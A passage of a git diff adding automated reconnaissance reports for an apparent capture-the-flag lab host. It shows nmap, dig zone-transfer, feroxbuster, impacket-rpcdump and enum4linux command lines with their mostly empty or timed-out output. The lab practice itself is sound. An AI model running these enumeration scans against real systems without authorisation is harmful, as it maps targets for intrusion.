-oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:49:46 2023 as: nmap -vv --reason -Pn -T4 -sV -p 464 --script=banner,krb5-enum-users -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml 10.129.243.131 +Nmap scan report for 10.129.243.131 +Host is up, received user-set. +Scanned at 2023-10-28 13:49:47 CEST for 1s + +PORT STATE SERVICE REASON VERSION +464/tcp filtered kpasswd5 no-response + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 3.44 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/DNS Reverse Lookup.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/DNS Reverse Lookup.md new file mode 100644 index 00000000..24bdd4c6 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/DNS Reverse Lookup.md @@ -0,0 +1,18 @@ +```bash +dig -p 53 -x 10.129.243.131 @10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_reverse-lookup.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_reverse-lookup.txt): + +``` +;; communications error to 10.129.243.131#53: timed out +;; communications error to 10.129.243.131#53: timed out +;; communications error to 10.129.243.131#53: timed out + +; <<>> DiG 9.18.11-2-Debian <<>> -p 53 -x 10.129.243.131 @10.129.243.131 +;; global options: +cmd +;; no servers could be reached + + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/DNS Zone Transfer.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/DNS Zone Transfer.md new file mode 100644 index 00000000..2633b124 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/DNS Zone Transfer.md @@ -0,0 +1,19 @@ +```bash +dig AXFR -p 53 @10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_zone-transfer.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_zone-transfer.txt): + +``` +;; communications error to 10.129.243.131#53: timed out +;; communications error to 10.129.243.131#53: timed out +;; communications error to 10.129.243.131#53: timed out + +; <<>> DiG 9.18.11-2-Debian <<>> AXFR -p 53 @10.129.243.131 +; (1 server found) +;; global options: +cmd +;; no servers could be reached + + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/Nmap DNS.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/Nmap DNS.md new file mode 100644 index 00000000..98ca9636 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/Nmap DNS.md @@ -0,0 +1,23 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:49:45 2023 as: nmap -vv --reason -Pn -T4 -sV -p 53 "--script=banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml 10.129.243.131 +Nmap scan report for 10.129.243.131 +Host is up, received user-set. +Scanned at 2023-10-28 13:49:47 CEST for 2s + +PORT STATE SERVICE REASON VERSION +53/tcp filtered domain no-response + +Host script results: +|_dns-brute: Can't guess domain of "10.129.243.131"; use dns-brute.domain script argument. + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 3.81 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-593-ncacn_http/rpcdump.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-593-ncacn_http/rpcdump.md new file mode 100644 index 00000000..e17fa24d --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-593-ncacn_http/rpcdump.md @@ -0,0 +1,15 @@ +```bash +impacket-rpcdump -port 593 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp593/tcp_593_rpc_rpcdump.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp593/tcp_593_rpc_rpcdump.txt): + +``` +Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation + +[*] Retrieving endpoint list from 10.129.243.131 +[-] Protocol failed: Could not connect: timed out +[*] No endpoints found. + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Curl Robots.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Curl Robots.md new file mode 100644 index 00000000..c34ad83e --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Curl Robots.md @@ -0,0 +1,3 @@ +```bash +curl -sSikf http://10.129.243.131:80/robots.txt +``` \ No newline at end of file diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Curl.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Curl.md new file mode 100644 index 00000000..6a1b93eb --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Curl.md @@ -0,0 +1,60 @@ +```bash +curl -sSik http://10.129.243.131:80/ +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_curl.html](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_curl.html): + +``` +HTTP/1.1 200 OK +Content-Type: text/html +Last-Modified: Fri, 20 Aug 2021 13:39:48 GMT +Accept-Ranges: bytes +ETag: "0eaf6d7c895d71:0" +Server: Microsoft-IIS/10.0 +Date: Sat, 28 Oct 2023 12:50:12 GMT +Content-Length: 1034 + + + + + + Slandovia Energy + + + + + + + +
+ + + + +
+ +

MegaCorp

+

+ Slandovia Energy Grid +

+ +
+ + + + + + +
    + no results +
+
+ + + + + + + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Directory Buster.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Directory Buster.md new file mode 100644 index 00000000..a1d10f40 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Directory Buster.md @@ -0,0 +1,18 @@ +```bash +feroxbuster -u http://10.129.243.131:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt" +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt): + +``` +200 GET 25l 72w 692c http://10.129.243.131/script.js +200 GET 215l 294w 3166c http://10.129.243.131/style.css +200 GET 41l 66w 1034c http://10.129.243.131/ +200 GET 41l 66w 1034c http://10.129.243.131/Index.html +200 GET 8l 168w 1092c http://10.129.243.131/LICENSE.txt +200 GET 1l 14w 116c http://10.129.243.131/Search.php +200 GET 41l 66w 1034c http://10.129.243.131/index.html +200 GET 8l 168w 1092c http://10.129.243.131/license.txt +200 GET 1l 14w 116c http://10.129.243.131/search.php + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Known Security.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Known Security.md new file mode 100644 index 00000000..1aa59a75 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Known Security.md @@ -0,0 +1,3 @@ +```bash +curl -sSikf http://10.129.243.131:80/.well-known/security.txt +``` \ No newline at end of file diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Nmap HTTP.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Nmap HTTP.md new file mode 100644 index 00000000..80a14cd3 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Nmap HTTP.md @@ -0,0 +1,20 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:49:45 2023 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml 10.129.243.131 +Nmap scan report for 10.129.243.131 +Host is up, received user-set. +Scanned at 2023-10-28 13:49:48 CEST for 1s + +PORT STATE SERVICE REASON VERSION +80/tcp filtered http no-response + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 4.02 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/whatweb.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/whatweb.md new file mode 100644 index 00000000..293f82bb --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/whatweb.md @@ -0,0 +1,10 @@ +```bash +whatweb --color=never --no-errors -a 3 -v http://10.129.243.131:80 2>&1 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_whatweb.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_whatweb.txt): + +``` + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/wkhtmltoimage.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/wkhtmltoimage.md new file mode 100644 index 00000000..9615301b --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/wkhtmltoimage.md @@ -0,0 +1,3 @@ +```bash +wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png +``` \ No newline at end of file diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-88-kerberos-sec/Nmap Kerberos.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-88-kerberos-sec/Nmap Kerberos.md new file mode 100644 index 00000000..24e4a3ff --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-88-kerberos-sec/Nmap Kerberos.md @@ -0,0 +1,20 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -p 88 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:49:45 2023 as: nmap -vv --reason -Pn -T4 -sV -p 88 --script=banner,krb5-enum-users -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml 10.129.243.131 +Nmap scan report for 10.129.243.131 +Host is up, received user-set. +Scanned at 2023-10-28 13:49:47 CEST for 1s + +PORT STATE SERVICE REASON VERSION +88/tcp filtered kerberos-sec no-response + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:49:48 2023 -- 1 IP address (1 host up) scanned in 3.64 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-123-ntp/Nmap NTP.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-123-ntp/Nmap NTP.md new file mode 100644 index 00000000..3e43b008 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-123-ntp/Nmap NTP.md @@ -0,0 +1,22 @@ +```bash +nmap -vv --reason -Pn -T4 -sU -sV -p 123 --script="banner,(ntp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/xml/udp_123_ntp_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 14:15:18 2023 as: nmap -vv --reason -Pn -T4 -sU -sV -p 123 "--script=banner,(ntp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/xml/udp_123_ntp_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set (0.056s latency). +Scanned at 2023-10-28 14:15:19 CEST for 10s + +PORT STATE SERVICE REASON VERSION +123/udp open ntp udp-response ttl 127 NTP v3 +| ntp-info: +|_ receive time stamp: 2023-10-28T12:15:20 + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:15:29 2023 -- 1 IP address (1 host up) scanned in 11.02 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/DNS Reverse Lookup.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/DNS Reverse Lookup.md new file mode 100644 index 00000000..d1f597df --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/DNS Reverse Lookup.md @@ -0,0 +1,29 @@ +```bash +dig -p 53 -x 10.129.243.131 @10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_reverse-lookup.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_reverse-lookup.txt): + +``` +;; communications error to 10.129.243.131#53: timed out +;; communications error to 10.129.243.131#53: timed out + +; <<>> DiG 9.18.11-2-Debian <<>> -p 53 -x 10.129.243.131 @10.129.243.131 +;; global options: +cmd +;; Got answer: +;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 16548 +;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1 + +;; OPT PSEUDOSECTION: +; EDNS: version: 0, flags:; udp: 4000 +;; QUESTION SECTION: +;131.243.129.10.in-addr.arpa. IN PTR + +;; Query time: 4303 msec +;; SERVER: 10.129.243.131#53(10.129.243.131) (UDP) +;; WHEN: Sat Oct 28 14:15:33 CEST 2023 +;; MSG SIZE rcvd: 56 + + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/DNS Zone Transfer.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/DNS Zone Transfer.md new file mode 100644 index 00000000..e4993241 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/DNS Zone Transfer.md @@ -0,0 +1,21 @@ +```bash +dig AXFR -p 53 @10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer.txt): + +``` +;; communications error to 10.129.243.131#53: timed out +;; communications error to 10.129.243.131#53: timed out + +; <<>> DiG 9.18.11-2-Debian <<>> AXFR -p 53 @10.129.243.131 +; (1 server found) +;; global options: +cmd +;; Query time: 4299 msec +;; SERVER: 10.129.243.131#53(10.129.243.131) (UDP) +;; WHEN: Sat Oct 28 14:15:33 CEST 2023 +;; MSG SIZE rcvd: 28 + + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/Nmap DNS.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/Nmap DNS.md new file mode 100644 index 00000000..db514546 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/Nmap DNS.md @@ -0,0 +1,40 @@ +```bash +nmap -vv --reason -Pn -T4 -sU -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 14:15:18 2023 as: nmap -vv --reason -Pn -T4 -sU -sV -p 53 "--script=banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set. +Scanned at 2023-10-28 14:15:19 CEST for 116s + +PORT STATE SERVICE REASON VERSION +53/udp open domain? udp-response +| fingerprint-strings: +| DNS-SD: +| _services +| _dns-sd +| _udp +|_ local +| dns-nsec3-enum: +|_ DNSSEC NSEC3 not supported +|_dns-cache-snoop: 0 of 100 tested domains are cached. +| dns-nsec-enum: +|_ No NSEC records found +1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : +SF-Port53-UDP:V=7.93%I=7%D=10/28%Time=653CFB97%P=x86_64-pc-linux-gnu%r(AFS +SF:VersionRequest,20,"\0\0\x83\x81\0\0\0\0\0\0\0e\0\0\0\0\0\0\0\0\r\x05\0\ +SF:0\0\0\0\0\0\0\0\0")%r(DNS-SD,2E,"\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_servi +SF:ces\x07_dns-sd\x04_udp\x05local\0\0\x0c\0\x01"); + +Host script results: +| dns-brute: +|_ DNS Brute-force hostnames: No results. + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:17:15 2023 -- 1 IP address (1 host up) scanned in 116.97 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_commands.log b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_commands.log new file mode 100644 index 00000000..f171236d --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_commands.log @@ -0,0 +1,288 @@ +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131 + +dig -p 53 -x 10.129.243.131 @10.129.243.131 + +dig AXFR -p 53 @10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml" 10.129.243.131 + +feroxbuster -u http://10.129.243.131:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt" + +curl -sSikf http://10.129.243.131:80/.well-known/security.txt + +curl -sSikf http://10.129.243.131:80/robots.txt + +curl -sSik http://10.129.243.131:80/ + +nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.243.131 + +whatweb --color=never --no-errors -a 3 -v http://10.129.243.131:80 2>&1 + +wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png + +nmap -vv --reason -Pn -T4 -sV -p 88 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml" 10.129.243.131 + +impacket-getArch -target 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 135 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 135 10.129.243.131 + +enum4linux -a -M -l -d 10.129.243.131 2>&1 + +nbtscan -rvh 10.129.243.131 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 139 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN 